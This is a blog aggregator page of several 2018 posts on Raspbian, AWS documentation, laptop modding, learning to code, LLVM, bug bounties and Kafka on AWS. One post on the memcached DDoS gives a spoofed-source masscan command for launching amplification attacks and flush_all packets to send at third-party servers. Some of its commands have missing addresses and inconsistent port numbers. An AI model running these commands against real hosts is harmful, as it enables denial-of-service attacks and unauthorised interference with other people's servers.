Tag Archives: bug

Raspbian update: supporting different screen sizes

Post Syndicated from Simon Long original https://www.raspberrypi.org/blog/raspbian-update-screen-sizes/

You may have noticed that we released a updated Raspbian software image yesterday. While the main reason for the new image was to provide support for the new Raspberry Pi 3 Model B+, the image also includes, alongside the usual set of bug fixes and minor tweaks, one significant chunk of new functionality that is worth pointing out.

Updating Raspbian on your Raspberry Pi

How to update to the latest version of Raspbian on your Raspberry Pi.


As a software developer, one of the most awkward things to deal with is what is known as platform fragmentation: having to write code that works on all the different devices and configurations people use. In my spare time, I write applications for iOS, and this has become increasingly painful over the last few years. When I wrote my first iPhone application, it only had to work on the original iPhone, but nowadays any iOS application has to work across several models of iPhone and iPad (which all have different processors and screens), and also across the various releases of iOS. And that’s before you start to consider making your code run on Android as well…

Screenshot of clean Raspbian desktop

The good thing about developing for Raspberry Pi is that there is only a relatively small number of different models of Pi hardware. We try our best to make sure that, wherever possible, the Raspberry Pi Desktop software works on every model of Pi ever sold, and we’ve managed to do this for most of the software in the image. The only exceptions are some of the more recent applications like Chromium, which won’t run on the older ARM6 processors in the Pi 1 and the Pi Zero, and some applications that run very slowly due to needing more memory than the older platforms have.

Raspbian with different screen resolutions

But there is one area where we have no control over the hardware, and that is screen resolution. The HDMI port on the Pi supports a wide range of resolutions, and when you include the composite port and display connector as well, people can be using the desktop  on a huge number of different screen sizes.

Supporting a range of screen sizes is harder than you might think. One problem is that the Linux desktop environment is made up of a large selection of bits of software from various different developers, and not all of these support resizing. And the bits of software that do support resizing don’t all do it in the same way, so making everything resize at once can be awkward.

This is why one of the first things I did when I first started working on the desktop was to create the Appearance Settings application in order to bring a lot of the settings for things like font and icon sizes into one place. This avoids users having to tweak several configuration files whenever they wanted to change something.

Screenshot of appearance settings application in Raspbian

The Appearance Settings application was a good place to start regarding support of different screen sizes. One of the features I originally included was a button to set everything to a default value. This was really a default setting for screens of an average size, and the resulting defaults would not have worked that well on much smaller or much larger screens. Now, there is no longer a single defaults button, but a new Defaults tab with multiple options:

Screenshot of appearance settings application in Raspbian

These three options adjust font size, icon size, and various other settings to values which ought to work well on screens with a high or low resolution. (The For medium screens option has the same effect as the previous defaults button.) The results will not be perfect in all circumstances and for all applications — as mentioned above, there are many different components used to create the desktop, and some of them don’t provide any way of resizing what they draw. But using these options should set the most important parts of the desktop and installed applications, such as icons, fonts, and toolbars, to a suitable size.

Pixel doubling

We’ve added one other option for supporting high resolution screens. At the bottom of the System tab in the Raspberry Pi Configuration application, there is now an option for pixel doubling:

Screenshot of configuration application in Raspbian

We included this option to facilitate the use of the x86 version of Raspbian with ultra-high-resolution screens that have very small pixels, such as Apple’s Retina displays. When running our desktop on one of these, the tininess of the pixels made everything too small for comfortable use.

Enabling pixel doubling simply draws every pixel in the desktop as a 2×2 block of pixels on the screen, making everything exactly twice the size and resulting in a usable desktop on, for example, a MacBook Pro’s Retina display. We’ve included the option on the version of the desktop for the Pi as well, because we know that some people use their Pi with large-screen HDMI TVs.

As pixel doubling magnifies everything on the screen by a factor of two, it’s also a useful option for people with visual impairments.

How to update

As mentioned above, neither of these new functionalities is a perfect solution to dealing with different screen sizes, but we hope they will make life slightly easier for you if you’re trying to run the desktop on a small or large screen. The features are included in the new image we have just released to support the Pi 3B+. If you want to add them to your existing image, the standard upgrade from apt will do so. As shown in the video above, you can just open a terminal window and enter the following to update Raspbian:

sudo apt-get update
sudo apt-get dist-upgrade

As always, your feedback, either in comments here or on the forums, is very welcome.

The post Raspbian update: supporting different screen sizes appeared first on Raspberry Pi.

AWS Documentation is Now Open Source and on GitHub

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/aws-documentation-is-now-open-source-and-on-github/

Earlier this year we made the AWS SDK developer guides available as GitHub repos (all found within the awsdocs organization) and invited interested parties to contribute changes and improvements in the form of pull requests.

Today we are adding over 138 additional developer and user guides to the organization, and we are looking forward to receiving your requests. You can fix bugs, improve code samples (or submit new ones), add detail, and rewrite sentences and paragraphs in the interest of accuracy or clarity. You can also look at the commit history in order to learn more about new feature and service launches and to track improvements to the documents.

Making a Contribution
Before you get started, read the Amazon Open Source Code of Conduct and take a look at the Contributing Guidelines document (generally named CONTRIBUTING.md) for the AWS service of interest. Then create a GitHub account if you don’t already have one.

Once you find something to change or improve, visit the HTML version of the document and click on Edit on GitHub button at the top of the page:

This will allow you to edit the document in source form (typically Markdown or reStructuredText). The source code is used to produce the HTML, PDF, and Kindle versions of the documentation.

Once you are in GitHub, click on the pencil icon:

This creates a “fork” — a separate copy of the file that you can edit in isolation.

Next, make an edit. In general, as a new contributor to an open source project, you should gain experience and build your reputation by making small, high-quality edits. I’ll change “dozens of services” to “over one hundred services” in this document:

Then I summarize my change and click Propose file change:

I examine the differences to verify my changes and then click Create pull request:

Then I review the details and click Create pull request again:

The pull request (also known as a PR) makes its way to the Elastic Beanstalk documentation team and they get to decide if they want to accept it, reject it, or to engage in a conversation with me to learn more. The teams endeavor to respond to PRs within 48 hours, and I’ll be notified via GitHub whenever the status of the PR changes.

As is the case with most open source projects, a steady stream of focused, modest-sized pull requests is preferable to the occasional king-sized request with dozens of edits inside.

If I am interested in tracking changes to a repo over time, I can Watch and/or Star it:

If I Watch a repo, I’ll receive an email whenever there’s a new release, issue, or pull request for that service guide.

Go Fork It
This launch gives you another way to help us to improve AWS. Let me know what you think!


2018-03-13 китайски лаптоп

Post Syndicated from Vasil Kolev original https://vasil.ludost.net/blog/?p=3380

(те всичките лаптопи се правят в Китай вече, ама не ми хрумва как да го кръстя иначе)

Преди някакво време разбрах за един проект на ентусиасти от Китай за нови дъна за стари лаптопи. От много време ми липсваше 4:3 дисплея, T420 от време на време ми беше бавен (дори с 16GB памет и SSD), по-новите thinkpad-и са с гадна клавиатура, а Retro проекта в крайна сметка не беше customizable и не беше приемлив (с тая NVidia карта и широк дисплей, да не говорим за цената).

Поръчах си един t60p от ebay, и след като дойде тръгнах да си поръчвам дъното. От форума на хората и някаква facebook страница намерих контакти, писах си с един човек, който ми предложи директно лаптоп, но аз си поръчах само дъното (in hindsight, да си бях взел цял лаптоп). Няколко неща по темата с поръчването:
– опциите бяха SWIFT и western union. Не ми се разхождаше, та го направих по SWIFT, и там се оказа, че има допълнителни такси, които взимат от получателя (които не могат да вземат от мен);
– За освобождаване от митница ми поискаха следните неща: фактура (която поисках да ми издадат, щото нямаше) която включва и цената и транспортните разходи, EORI номер, пълномощно да ме представляват и документ за направеното плащане (изискване на митниците за стоки от Китай и Хонг Конг, пише “SWIFT или PayPal”);
– EORI номер може да си издадете безплатно, ако имате електронен подпис и търпение (бях си издал за нещо друго, отне около седмица);
– DHL могат да пратят как изглежда митническата декларация, да си я платите с един online превод и да си получите нещата (иначе искат 24 лв да направят превода те);

Дъното беше $780 и доставка, вариантът за това дъно с цял лаптоп (без памет) беше $980 за 1400×1050 матрица и $1100 с 1600×1200 матрица (нови, IPS, по думи на продавача).

Хората си имат и форум, в който има и инструкции за сглобяване (google translate е ваш добър приятел за тия страници). При мен сглобяването се забави, понеже се оказа, че има вариант на T60p, който е с 16:10 матрица, за който дъното не става, и аз съм взел точно такъв, та си поръчвах нов и чаках да пристигне.

Последва сглабянето с помощта на добрите хора от adsys (на които им отрових живота, щото се оказа доста пипкава работа):
– има малко рязане по кутията (има го описано във форума, със снимки);
– болтовете за закачане са по-малко, дупките на някои са запушени;
– на дъното до конектора за монитор има превключвател за типа на дисплея (1024×768 или по-голям);
– трябва ви DDR4 памет;
– най-вероятно wifi картата от преди няма да ви върши работа, аз си взех моята от T420-ката, и малко трябваше да се лепне с тиксо, понеже е половината слот и нямам преходник;
– CD-то от T60 няма да влезе, понеже е PATA, а конектора на дъното е SATA (не, че ползвам CD). Трябва да си измисля нещо за запушване на дупката;

Неща за дооправяне:
– поне за момента под linux GPU-то не работи (забива на boot), и за това си ползвам xfwm4 вместо compiz, submit-нал съм bug report;
– горните бутони на touchpad-а спират да работят след suspend/resume, направил съм един fix, ама трябва да събера желание да рестартирам.

Моята работна среда на 4:3 се усеща доста по-приятно и най-накрая мога да си пусна email клиента в режим като преди (отляво списък папки, отдясно разделено на две – отгоре списък писма, отдолу отвореното писмо, вместо три вертикални колони, дето едвам пасваха). Също така с тоя процесор вече firefox-а се движи почти прилично, като си оправя и GPU-то, вероятно всичко ще лети.

Coding is for girls

Post Syndicated from magda original https://www.raspberrypi.org/blog/coding-is-for-girls/

Less than four years ago, Magda Jadach was convinced that programming wasn’t for girls. On International Women’s Day, she tells us how she discovered that it definitely is, and how she embarked on the new career that has brought her to Raspberry Pi as a software developer.

“Coding is for boys”, “in order to be a developer you have to be some kind of super-human”, and “it’s too late to learn how to code” – none of these three things is true, and I am going to prove that to you in this post. By doing this I hope to help some people to get involved in the tech industry and digital making. Programming is for anyone who loves to create and loves to improve themselves.

In the summer of 2014, I started the journey towards learning how to code. I attended my first coding workshop at the recommendation of my boyfriend, who had constantly told me about the skill and how great it was to learn. I was convinced that, at 28 years old, I was already too old to learn. I didn’t have a technical background, I was under the impression that “coding is for boys”, and I lacked the superpowers I was sure I needed. I decided to go to the workshop only to prove him wrong.

Later on, I realised that coding is a skill like any other. You can compare it to learning any language: there’s grammar, vocabulary, and other rules to acquire.

Log In or Sign Up to View

See posts, photos and more on Facebook.

Alien message in console

To my surprise, the workshop was completely inspiring. Within six hours I was able to create my first web page. It was a really simple page with a few cats, some colours, and ‘Hello world’ text. This was a few years ago, but I still remember when I first clicked “view source” to inspect the page. It looked like some strange alien message, as if I’d somehow broken the computer.

I wanted to learn more, but with so many options, I found myself a little overwhelmed. I’d never taught myself any technical skill before, and there was a lot of confusing jargon and new terms to get used to. What was HTML? CSS and JavaScript? What were databases, and how could I connect together all the dots and choose what I wanted to learn? Luckily I had support and was able to keep going.

At times, I felt very isolated. Was I the only girl learning to code? I wasn’t aware of many female role models until I started going to more workshops. I met a lot of great female developers, and thanks to their support and help, I kept coding.

Another struggle I faced was the language barrier. I am not a native speaker of English, and diving into English technical documentation wasn’t easy. The learning curve is daunting in the beginning, but it’s completely normal to feel uncomfortable and to think that you’re really bad at coding. Don’t let this bring you down. Everyone thinks this from time to time.

Play with Raspberry Pi and quit your job

I kept on improving my skills, and my interest in developing grew. However, I had no idea that I could do this for a living; I simply enjoyed coding. Since I had a day job as a journalist, I was learning in the evenings and during the weekends.

I spent long hours playing with a Raspberry Pi and setting up so many different projects to help me understand how the internet and computers work, and get to grips with the basics of electronics. I built my first ever robot buggy, retro game console, and light switch. For the first time in my life, I had a soldering iron in my hand. Day after day I become more obsessed with digital making.

Magdalena Jadach on Twitter

solderingiron Where have you been all my life? Weekend with #raspberrypi + @pimoroni + @Pololu + #solder = best time! #electricity

One day I realised that I couldn’t wait to finish my job and go home to finish some project that I was working on at the time. It was then that I decided to hand over my resignation letter and dive deep into coding.

For the next few months I completely devoted my time to learning new skills and preparing myself for my new career path.

I went for an interview and got my first ever coding internship. Two years, hundreds of lines of code, and thousands of hours spent in front of my computer later, I have landed my dream job at the Raspberry Pi Foundation as a software developer, which proves that dreams come true.

Animated GIF – Find & Share on GIPHY

Discover & share this Animated GIF with everyone you know. GIPHY is how you search, share, discover, and create GIFs.

Where to start?

I recommend starting with HTML & CSS – the same path that I chose. It is a relatively straightforward introduction to web development. You can follow my advice or choose a different approach. There is no “right” or “best” way to learn.

Below is a collection of free coding resources, both from Raspberry Pi and from elsewhere, that I think are useful for beginners to know about. There are other tools that you are going to want in your developer toolbox aside from HTML.

  • HTML and CSS are languages for describing, structuring, and styling web pages
  • You can learn JavaScript here and here
  • Raspberry Pi (obviously!) and our online learning projects
  • Scratch is a graphical programming language that lets you drag and combine code blocks to make a range of programs. It’s a good starting point
  • Git is version control software that helps you to work on your own projects and collaborate with other developers
  • Once you’ve got started, you will need a code editor. Sublime Text or Atom are great options for starting out

Coding gives you so much new inspiration, you learn new stuff constantly, and you meet so many amazing people who are willing to help you develop your skills. You can volunteer to help at a Code Club or  Coder Dojo to increase your exposure to code, or attend a Raspberry Jam to meet other like-minded makers and start your own journey towards becoming a developer.

The post Coding is for girls appeared first on Raspberry Pi.

LLVM 6.0.0 released

Post Syndicated from corbet original https://lwn.net/Articles/748863/rss

Version 6.0.0 of the LLVM compiler suite is out.
This release is the result of the community’s work over the past six
months, including: retpoline Spectre variant 2 mitigation,
significantly improved CodeView debug info for Windows, GlobalISel by
default for AArch64 at -O0, improved scheduling on several x86
micro-architectures, Clang defaults to -std=gnu++14 instead of
-std=gnu++98, support for some upcoming C++2a features, improved
optimizations, new compiler warnings, many bug fixes, and more.

Some notes on memcached DDoS

Post Syndicated from Robert Graham original http://blog.erratasec.com/2018/03/some-notes-on-memcached-ddos.html

I thought I’d write up some notes on the memcached DDoS. Specifically, I describe how many I found scanning the Internet with masscan, and how to use masscan as a killswitch to neuter the worst of the attacks.

Test your servers

I added code to my port scanner for this, then scanned the Internet:
masscan -pU:11211 –banners | grep memcached
This example scans the entire Internet (/0). Replaced with your address range (or ranges).
This produces output that looks like this:
Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=3935192 time=1520485363 version=1.4.17
Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=399858 time=1520485362 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=29429482 time=1520485363 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=2879363 time=1520485366 version=1.2.6
Banner on port 11211/udp on [memcached] uptime=42083736 time=1520485365 version=1.4.13
The “banners” check filters out those with valid memcached responses, so you don’t get other stuff that isn’t memcached. To filter this output further, use  the ‘cut’ to grab just column 6:
… | cut -d ‘ ‘ -f 6 | cut -d: -f1
You often get multiple responses to just one query, so you’ll want to sort/uniq the list:
… | sort | uniq

My results from an Internet wide scan

I got 15181 results (or roughly 15,000).
People are using Shodan to find a list of memcached servers. They might be getting a lot results back that response to TCP instead of UDP. Only UDP can be used for the attack.

Other researchers scanned the Internet a few days ago and found ~31k. I don’t know if this means people have been removing these from the Internet.

Masscan as exploit script

BTW, you can not only use masscan to find amplifiers, you can also use it to carry out the DDoS. Simply import the list of amplifier IP addresses, then spoof the source address as that of the target. All the responses will go back to the source address.
masscan -iL amplifiers.txt -pU:11211 –spoof-ip –rate 100000
I point this out to show how there’s no magic in exploiting this. Numerous exploit scripts have been released, because it’s so easy.

Why memcached servers are vulnerable

Like many servers, memcached listens to local IP address for local administration. By listening only on the local IP address, remote people cannot talk to the server.
However, this process is often buggy, and you end up listening on either (all interfaces) or on one of the external interfaces. There’s a common Linux network stack issue where this keeps happening, like trying to get VMs connected to the network. I forget the exact details, but the point is that lots of servers that intend to listen only on end up listening on external interfaces instead. It’s not a good security barrier.
Thus, there are lots of memcached servers listening on their control port (11211) on external interfaces.

How the protocol works

The protocol is documented here. It’s pretty straightforward.
The easiest amplification attacks is to send the “stats” command. This is 15 byte UDP packet that causes the server to send back either a large response full of useful statistics about the server.  You often see around 10 kilobytes of response across several packets.
A harder, but more effect attack uses a two step process. You first use the “add” or “set” commands to put chunks of data into the server, then send a “get” command to retrieve it. You can easily put 100-megabytes of data into the server this way, and causes a retrieval with a single “get” command.
That’s why this has been the largest amplification ever, because a single 100-byte packet can in theory cause a 100-megabytes response.
Doing the math, the 1.3 terabit/second DDoS divided across the 15,000 servers I found vulnerable on the Internet leads to an average of 100-megabits/second per server. This is fairly minor, and is indeed something even small servers (like Raspberry Pis) can generate.

Neutering the attack (“kill switch”)

If they are using the more powerful attack against you, you can neuter it: you can send a “flush_all” command back at the servers who are flooding you, causing them to drop all those large chunks of data from the cache.
I’m going to describe how I would do this.
First, get a list of attackers, meaning, the amplifiers that are flooding you. The way to do this is grab a packet sniffer and capture all packets with a source port of 11211. Here is an example using tcpdump.
tcpdump -i -w attackers.pcap src port 11221
Let that run for a while, then hit [ctrl-c] to stop, then extract the list of IP addresses in the capture file. The way I do this is with tshark (comes with Wireshark):
tshark -r attackers.pcap -Tfields -eip.src | sort | uniq > amplifiers.txt
Now, craft a flush_all payload. There are many ways of doing this. For example, if you are using nmap or masscan, you can add the bytes to the nmap-payloads.txt file. Also, masscan can read this directly from a packet capture file. To do this, first craft a packet, such as with the following command line foo:
echo -en “\x00\x00\x00\x00\x00\x01\x00\x00flush_all\r\n” | nc -q1 -u 11211
Capture this packet using tcpdump or something, and save into a file “flush_all.pcap”. If you want to skip this step, I’ve already done this for you, go grab the file from GitHub:
Now that we have our list of attackers (amplifiers.txt) and a payload to blast at them (flush_all.pcap), use masscan to send it:
masscan -iL amplifiers.txt -pU:112211 –pcap-payload flush_all.pcap

Reportedly, “shutdown” may also work to completely shutdown the amplifiers. I’ll leave that as an exercise for the reader, since of course you’ll be adversely affecting the servers.

Some notes

Here are some good reading on this attack:

Security updates for Wednesday

Post Syndicated from ris original https://lwn.net/Articles/748741/rss

Security updates have been issued by Arch Linux (python-django and python2-django), Debian (leptonlib), Fedora (bugzilla, cryptopp, electrum, firefox, freexl, glibc, jhead, libcdio, libsamplerate, libXcursor, libXfont, libXfont2, mingw-wavpack, nx-libs, php, python-crypto, quagga, sharutils, unzip, x2goserver, and xen), Gentoo (exim), openSUSE (cups, go1.8, ImageMagick, jgraphx, leptonica, openexr, tor, and wavpack), Red Hat (389-ds-base, java-1.7.1-ibm, kernel, kernel-rt, libreoffice, and php), SUSE (java-1_7_1-ibm), and Ubuntu (python-django).

Security Vulnerabilities in Smart Contracts

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/03/security_vulner_13.html

Interesting research: “Finding The Greedy, Prodigal, and Suicidal Contracts at Scale“:

Abstract: Smart contracts — stateful executable objects hosted on blockchains like Ethereum — carry billions of dollars worth of coins and cannot be updated once deployed. We present a new systematic characterization of a class of trace vulnerabilities, which result from analyzing multiple invocations of a contract over its lifetime. We focus attention on three example properties of such trace vulnerabilities: finding contracts that either lock funds indefinitely, leak them carelessly to arbitrary users, or can be killed by anyone. We implemented MAIAN, the first tool for precisely specifying and reasoning about trace properties, which employs inter-procedural symbolic analysis and concrete validator for exhibiting real exploits. Our analysis of nearly one million contracts flags 34,200 (2,365 distinct) contracts vulnerable, in 10 seconds per contract. On a subset of 3,759 contracts which we sampled for concrete validation and manual analysis, we reproduce real exploits at a true positive rate of 89%, yielding exploits for 3,686 contracts. Our tool finds exploits for the infamous Parity bug that indirectly locked 200 million dollars worth in Ether, which previous analyses failed to capture.

Setting up bug bounties for success

Post Syndicated from Michal Zalewski original https://lcamtuf.blogspot.com/2018/03/setting-up-bug-bounties-for-success.html

Bug bounties end up in the news with some regularity, usually for the wrong reasons. I’ve been itching to write
about that for a while – but instead of dwelling on the mistakes of the bygone days, I figured it may be better to
talk about some of the ways to get vulnerability rewards right.

What do you get out of bug bounties?

There’s plenty of differing views, but I like to think of such programs
simply as a bid on researchers’ time. In the most basic sense, you get three benefits:

  • Improved ability to detect bugs in production before they become major incidents.
  • A comparatively unbiased feedback loop to help you prioritize and measure other security work.
  • A robust talent pipeline for when you need to hire.

What bug bounties don’t offer?

You don’t get anything resembling a comprehensive security program or a systematic assessment of your platforms.
Researchers end up looking for bugs that offer favorable effort-to-payoff ratios for their skills and given the
very imperfect information they have about your enterprise. In other words, you may end up with a hundred
people looking for XSS and just one person looking for RCE.

Your reward structure can steer them toward the targets and bugs you care about, but it’s difficult to fully
eliminate this inherent skew. There’s only so far you can jack up your top-tier rewards, and only so far you can
go lowering the bottom-tier ones.

Don’t you have to outcompete the black market to get all the “good” bugs?

There is a free market price discovery component to it all: if you’re not getting the engagement you
were hoping for, you should probably consider paying more.

That said, there are going to be researchers who’d rather hurt you than work for you, no matter how much you pay;
you don’t have to win them over, and you don’t have to outspend every authoritarian government or
every crime syndicate. A bug bounty is effective simply if it attracts enough eyeballs to make bugs statistically
harder to find, and reduces the useful lifespan of any zero-days in black market trade. Plus, most
researchers don’t want their work to be used to crack down on dissidents in Egypt or Vietnam.

Another factor is that you’re paying for different things: a black market buyer probably wants a reliable exploit
capable of delivering payloads, and then demands silence for months or years to come; a vendor-run
bug bounty program is usually perfectly happy with a reproducible crash and doesn’t mind a researcher blogging
about their work.

In fact, while money is important, you will probably find out that it’s not enough to retain your top talent;
many folks want bug bounties to be more than a business transaction, and find a lot of value in having a close
relationship with your security team, comparing notes, and growing together. Fostering that partnership can
be more important than adding another $10,000 to your top reward.

How do I prevent it all from going horribly wrong?

Bug bounties are an unfamiliar beast to most lawyers and PR folks, so it’s a natural to be wary and try to plan
for every eventuality with pages and pages of impenetrable rules and fine-print legalese.

This is generally unnecessary: there is a strong self-selection bias, and almost every participant in a
vulnerability reward program will be coming to you in good faith. The more friendly, forthcoming, and
approachable you seem, and the more you treat them like peers, the more likely it is for your relationship to stay
positive. On the flip side, there is no faster way to make enemies than to make a security researcher feel that they
are now talking to a lawyer or to the PR dept.

Most people have strong opinions on disclosure policies; instead of imposing your own views, strive to patch reported bugs
reasonably quickly, and almost every reporter will play along. Demand researchers to cancel conference appearances,
take down blog posts, or sign NDAs, and you will sooner or later end up in the news.

But what if that’s not enough?

As with any business endeavor, mistakes will happen; total risk avoidance is seldom the answer. Learn to sincerely
apologize for mishaps; it’s not a sign of weakness to say “sorry, we messed up”. And you will almost certainly not end
up in the courtroom for doing so.

It’s good to foster a healthy and productive relationship with the community, so that they come to your defense when
something goes wrong. Encouraging people to disclose bugs and talk about their experiences is one way of accomplishing that.

What about extortion?

You should structure your program to naturally discourage bad behavior and make it stand out like a sore thumb.
Require bona fide reports with complete technical details before any reward decision is made by a panel of named peers;
and make it clear that you never demand non-disclosure as a condition of getting a reward.

To avoid researchers accidentally putting themselves in awkward situations, have clear rules around data exfiltration
and lateral movement: assure them that you will always pay based on the worst-case impact of their findings; in exchange,
ask them to stop as soon as they get a shell and never access any data that isn’t their own.

So… are there any downsides?

Yep. Other than souring up your relationship with the community if you implement your program wrong, the other consideration
is that bug bounties tend to generate a lot of noise from well-meaning but less-skilled researchers.

When this happens, do not get frustrated and do not penalize such participants; instead, help them grow. Consider
publishing educational articles, giving advice on how to investigate and structure reports, or
offering free workshops every now and then.

The other downside is cost; although bug bounties tend to offer far more bang for your buck than your average penetration
test, they are more random. The annual expenses tend to be fairly predictable, but there is always
some possibility of having to pay multiple top-tier rewards in rapid succession. This is the kind of uncertainty that
many mid-level budget planners react badly to.

Finally, you need to be able to fix the bugs you receive. It would be nuts to prefer to not know about the
vulnerabilities in the first place – but once you invite the research, the clock starts ticking and you need to
ship fixes reasonably fast.

So… should I try it?

There are folks who enthusiastically advocate for bug bounties in every conceivable situation, and people who dislike them
with fierce passion; both sentiments are usually strongly correlated with the line of business they are in.

In reality, bug bounties are not a cure-all, and there are some ways to make them ineffectual or even dangerous.
But they are not as risky or expensive as most people suspect, and when done right, they can actually be fun for your
team, too. You won’t know for sure until you try.

Ubuntu 16.04.4 LTS released

Post Syndicated from jake original https://lwn.net/Articles/748447/rss

The fourth update to the Ubuntu 16.04 long-term support distribution has been released; it is available from the “Get Ubuntu” web page. “As usual, this point release includes many updates, and updated
installation media has been provided so that fewer updates will need to
be downloaded after installation. These include security updates and
corrections for other high-impact bugs, with a focus on maintaining
stability and compatibility with Ubuntu 16.04 LTS.

Kubuntu 16.04.4 LTS, Xubuntu 16.04.4 LTS, Mythbuntu 16.04.4 LTS,
Ubuntu GNOME 16.04.4 LTS, Lubuntu 16.04.4 LTS, Ubuntu Kylin 16.04.4 LTS,
Ubuntu MATE 16.04.4 LTS and Ubuntu Studio 16.04.4 LTS are also now
available.” Information about what has changed can be found in the overall release notes and in the release notes for the various Ubuntu flavors.

Best Practices for Running Apache Kafka on AWS

Post Syndicated from Prasad Alle original https://aws.amazon.com/blogs/big-data/best-practices-for-running-apache-kafka-on-aws/

This post was written in partnership with Intuit to share learnings, best practices, and recommendations for running an Apache Kafka cluster on AWS. Thanks to Vaishak Suresh and his colleagues at Intuit for their contribution and support.

Intuit, in their own words: Intuit, a leading enterprise customer for AWS, is a creator of business and financial management solutions. For more information on how Intuit partners with AWS, see our previous blog post, Real-time Stream Processing Using Apache Spark Streaming and Apache Kafka on AWS. Apache Kafka is an open-source, distributed streaming platform that enables you to build real-time streaming applications.

The best practices described in this post are based on our experience in running and operating large-scale Kafka clusters on AWS for more than two years. Our intent for this post is to help AWS customers who are currently running Kafka on AWS, and also customers who are considering migrating on-premises Kafka deployments to AWS.

AWS offers Amazon Kinesis Data Streams, a Kafka alternative that is fully managed.

Running your Kafka deployment on Amazon EC2 provides a high performance, scalable solution for ingesting streaming data. AWS offers many different instance types and storage option combinations for Kafka deployments. However, given the number of possible deployment topologies, it’s not always trivial to select the most appropriate strategy suitable for your use case.

In this blog post, we cover the following aspects of running Kafka clusters on AWS:

  • Deployment considerations and patterns
  • Storage options
  • Instance types
  • Networking
  • Upgrades
  • Performance tuning
  • Monitoring
  • Security
  • Backup and restore

Note: While implementing Kafka clusters in a production environment, make sure also to consider factors like your number of messages, message size, monitoring, failure handling, and any operational issues.

Deployment considerations and patterns

In this section, we discuss various deployment options available for Kafka on AWS, along with pros and cons of each option. A successful deployment starts with thoughtful consideration of these options. Considering availability, consistency, and operational overhead of the deployment helps when choosing the right option.

Single AWS Region, Three Availability Zones, All Active

One typical deployment pattern (all active) is in a single AWS Region with three Availability Zones (AZs). One Kafka cluster is deployed in each AZ along with Apache ZooKeeper and Kafka producer and consumer instances as shown in the illustration following.

In this pattern, this is the Kafka cluster deployment:

  • Kafka producers and Kafka cluster are deployed on each AZ.
  • Data is distributed evenly across three Kafka clusters by using Elastic Load Balancer.
  • Kafka consumers aggregate data from all three Kafka clusters.

Kafka cluster failover occurs this way:

  • Mark down all Kafka producers
  • Stop consumers
  • Debug and restack Kafka
  • Restart consumers
  • Restart Kafka producers

Following are the pros and cons of this pattern.

Pros Cons
  • Highly available
  • Can sustain the failure of two AZs
  • No message loss during failover
  • Simple deployment


  • Very high operational overhead:
    • All changes need to be deployed three times, one for each Kafka cluster
    • Maintaining and monitoring three Kafka clusters
    • Maintaining and monitoring three consumer clusters

A restart is required for patching and upgrading brokers in a Kafka cluster. In this approach, a rolling upgrade is done separately for each cluster.

Single Region, Three Availability Zones, Active-Standby

Another typical deployment pattern (active-standby) is in a single AWS Region with a single Kafka cluster and Kafka brokers and Zookeepers distributed across three AZs. Another similar Kafka cluster acts as a standby as shown in the illustration following. You can use Kafka mirroring with MirrorMaker to replicate messages between any two clusters.

In this pattern, this is the Kafka cluster deployment:

  • Kafka producers are deployed on all three AZs.
  • Only one Kafka cluster is deployed across three AZs (active).
  • ZooKeeper instances are deployed on each AZ.
  • Brokers are spread evenly across all three AZs.
  • Kafka consumers can be deployed across all three AZs.
  • Standby Kafka producers and a Multi-AZ Kafka cluster are part of the deployment.

Kafka cluster failover occurs this way:

  • Switch traffic to standby Kafka producers cluster and Kafka cluster.
  • Restart consumers to consume from standby Kafka cluster.

Following are the pros and cons of this pattern.

Pros Cons
  • Less operational overhead when compared to the first option
  • Only one Kafka cluster to manage and consume data from
  • Can handle single AZ failures without activating a standby Kafka cluster
  • Added latency due to cross-AZ data transfer among Kafka brokers
  • For Kafka versions before 0.10, replicas for topic partitions have to be assigned so they’re distributed to the brokers on different AZs (rack-awareness)
  • The cluster can become unavailable in case of a network glitch, where ZooKeeper does not see Kafka brokers
  • Possibility of in-transit message loss during failover

Intuit recommends using a single Kafka cluster in one AWS Region, with brokers distributing across three AZs (single region, three AZs). This approach offers stronger fault tolerance than otherwise, because a failed AZ won’t cause Kafka downtime.

Storage options

There are two storage options for file storage in Amazon EC2:

Ephemeral storage is local to the Amazon EC2 instance. It can provide high IOPS based on the instance type. On the other hand, Amazon EBS volumes offer higher resiliency and you can configure IOPS based on your storage needs. EBS volumes also offer some distinct advantages in terms of recovery time. Your choice of storage is closely related to the type of workload supported by your Kafka cluster.

Kafka provides built-in fault tolerance by replicating data partitions across a configurable number of instances. If a broker fails, you can recover it by fetching all the data from other brokers in the cluster that host the other replicas. Depending on the size of the data transfer, it can affect recovery process and network traffic. These in turn eventually affect the cluster’s performance.

The following table contrasts the benefits of using an instance store versus using EBS for storage.

Instance store EBS
  • Instance storage is recommended for large- and medium-sized Kafka clusters. For a large cluster, read/write traffic is distributed across a high number of brokers, so the loss of a broker has less of an impact. However, for smaller clusters, a quick recovery for the failed node is important, but a failed broker takes longer and requires more network traffic for a smaller Kafka cluster.
  • Storage-optimized instances like h1, i3, and d2 are an ideal choice for distributed applications like Kafka.


  • The primary advantage of using EBS in a Kafka deployment is that it significantly reduces data-transfer traffic when a broker fails or must be replaced. The replacement broker joins the cluster much faster.
  • Data stored on EBS is persisted in case of an instance failure or termination. The broker’s data stored on an EBS volume remains intact, and you can mount the EBS volume to a new EC2 instance. Most of the replicated data for the replacement broker is already available in the EBS volume and need not be copied over the network from another broker. Only the changes made after the original broker failure need to be transferred across the network. That makes this process much faster.



Intuit chose EBS because of their frequent instance restacking requirements and also other benefits provided by EBS.

Generally, Kafka deployments use a replication factor of three. EBS offers replication within their service, so Intuit chose a replication factor of two instead of three.

Instance types

The choice of instance types is generally driven by the type of storage required for your streaming applications on a Kafka cluster. If your application requires ephemeral storage, h1, i3, and d2 instances are your best option.

Intuit used r3.xlarge instances for their brokers and r3.large for ZooKeeper, with ST1 (throughput optimized HDD) EBS for their Kafka cluster.

Here are sample benchmark numbers from Intuit tests.

Configuration Broker bytes (MB/s)
  • r3.xlarge
  • ST1 EBS
  • 12 brokers
  • 12 partitions


Aggregate 346.9

If you need EBS storage, then AWS has a newer-generation r4 instance. The r4 instance is superior to R3 in many ways:

  • It has a faster processor (Broadwell).
  • EBS is optimized by default.
  • It features networking based on Elastic Network Adapter (ENA), with up to 10 Gbps on smaller sizes.
